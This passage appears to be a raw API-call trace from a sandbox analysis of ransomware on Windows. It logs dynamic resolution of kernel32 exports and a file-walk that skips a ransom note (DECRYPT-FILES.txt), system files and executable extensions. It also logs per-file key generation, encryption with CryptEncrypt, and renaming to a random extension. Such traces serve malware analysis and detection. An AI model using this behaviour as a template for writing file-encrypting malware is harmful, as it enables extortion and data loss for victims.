20 [0083.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.339] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.339] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.339] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.339] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.339] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.339] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.339] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.339] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.339] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wgz_pfNl6IjRGQlG07.mp3") returned 70 [0083.339] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wgz_pfNl6IjRGQlG07.mp3.DZs2U") returned 76 [0083.339] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wgz_pfNl6IjRGQlG07.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\wgz_pfnl6ijrgqlg07.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wgz_pfNl6IjRGQlG07.mp3.DZs2U" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\wgz_pfnl6ijrgqlg07.mp3.dzs2u"), dwFlags=0x0) returned 1 [0083.340] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.340] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.340] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.340] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4415530, ftCreationTime.dwHighDateTime=0x1d4d34a, ftLastAccessTime.dwLowDateTime=0x5d1a43d0, ftLastAccessTime.dwHighDateTime=0x1d4d1c2, ftLastWriteTime.dwLowDateTime=0x5d1a43d0, ftLastWriteTime.dwHighDateTime=0x1d4d1c2, nFileSizeHigh=0x0, nFileSizeLow=0xbe26, dwReserved0=0x0, dwReserved1=0x0, cFileName="wSmC4QXIW6WmrmV.bmp", cAlternateFileName="WSMC4Q~1.BMP")) returned 1 [0083.340] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0083.340] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp", lpString2="autorun.inf") returned 1 [0083.340] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp", lpString2="boot.ini") returned 1 [0083.341] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp", lpString2="desktop.ini") returned 1 [0083.341] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp", lpString2="ntuser.dat") returned 1 [0083.341] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp", lpString2="iconcache.db") returned 1 [0083.341] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp", lpString2="bootsect.bak") returned 1 [0083.341] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp", lpString2="ntuser.dat.log") returned 1 [0083.341] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp", lpString2="thumbs.db") returned 1 [0083.341] lstrcmpiW (lpString1="wSmC4QXIW6WmrmV.bmp", lpString2="Bootfont.bin") returned 1 [0083.341] lstrlenW (lpString="wSmC4QXIW6WmrmV.bmp") returned 19 [0083.341] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0083.341] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0083.341] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0083.341] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0083.341] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned 48 [0083.341] lstrlenW (lpString="wSmC4QXIW6WmrmV.bmp") returned 19 [0083.341] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\" [0083.341] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="wSmC4QXIW6WmrmV.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wSmC4QXIW6WmrmV.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wSmC4QXIW6WmrmV.bmp" [0083.341] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\wSmC4QXIW6WmrmV.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\wsmc4qxiw6wmrmv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0083.341] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=48678) returned 1 [0083.341] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0083.341] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.342] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.342] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.342] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.342] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.342] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.343] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.343] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.344] CloseHandle (hObject=0x444) returned 1 [0083.344] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.344] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.345] CloseHandle (hObject=0x0) returned 0 [0083.345] CloseHandle (hObject=0x440) returned 1 [0083.345] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.345] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.345] GetTickCount () returned 0x114d4dc [0083.345] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.346] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.346] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.346] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.346] lstrlenA (lpString="kernel32.dll") returned 12 [0083.346] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.346] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.346] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.346] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.347] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.347] lstrlenA (lpString="ADDATOMA") returned 8 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.347] lstrlenA (lpString="ADDATOMW") returned 8 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.347] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.347] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.347] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.347] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.347] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.347] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.347] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.347] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.347] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.347] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.347] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.347] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.347] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.347] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.347] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.347] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.347] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.348] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.348] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.348] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.348] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.348] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.348] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.348] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.348] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.348] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.348] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.348] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.348] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.348] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.348] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.348] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.348] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.348] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.348] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.348] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.349] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.349] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.349] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.349] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.349] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.349] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.349] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.349] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.349] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.349] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.349] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.349] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.349] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.349] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.349] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.349] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.350] lstrlenA (lpString="BEEP") returned 4 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.350] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.350] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.350] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.350] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.350] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.350] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.350] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.350] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.350] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.350] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.350] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.350] lstrlenA (lpString="CANCELIO") returned 8 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.350] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.350] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.350] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.350] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.350] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.350] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.350] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.351] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.351] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.351] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.351] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.351] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") 